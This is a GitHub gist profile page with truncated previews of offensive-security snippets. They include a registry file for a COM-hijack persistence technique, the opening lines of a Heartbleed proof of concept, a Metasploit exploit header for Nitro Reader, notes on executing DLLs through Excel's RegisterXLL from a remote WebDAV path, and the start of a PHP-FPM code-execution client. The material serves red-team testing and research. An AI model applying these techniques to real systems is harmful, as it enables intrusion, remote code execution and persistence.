Skip to content

Instantly share code, notes, and snippets.

View JohnHubcr's full-sized avatar

JohnHubcr

70 followers · 200 following
View GitHub Profile
@JohnHubcr
JohnHubcr / winlogon.reg
Created February 12, 2018 04:35 — forked from anonymous/winlogon.reg
WinLogon Windows 7 x64 COM Hijack
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@JohnHubcr
JohnHubcr / ssltest.py
Created July 30, 2017 02:26 — forked from sh1n0b1/ssltest.py
Python Heartbleed (CVE-2014-0160) Proof of Concept
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
@JohnHubcr
JohnHubcr / nitro_reader_jsapi.rb
Created July 25, 2017 12:51
A z̶e̶r̶o̶ one-day exploit for Nitro Reader and Nitro Reader Pro
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
@JohnHubcr
JohnHubcr / ExcelXLL.md
Created July 25, 2017 12:47 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@JohnHubcr
JohnHubcr / info_sec python modules
Created May 7, 2017 11:56 — forked from sh1nu11bi/info_sec python modules
This a collection of Python modules commonly associated with InfoSec.
Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
Dirtbags py-pcap: read pcap files without libpcap
flowgrep: grep through packet payloads using regular expressions
Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
@JohnHubcr
JohnHubcr / fpm.py
Created May 6, 2017 00:41 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False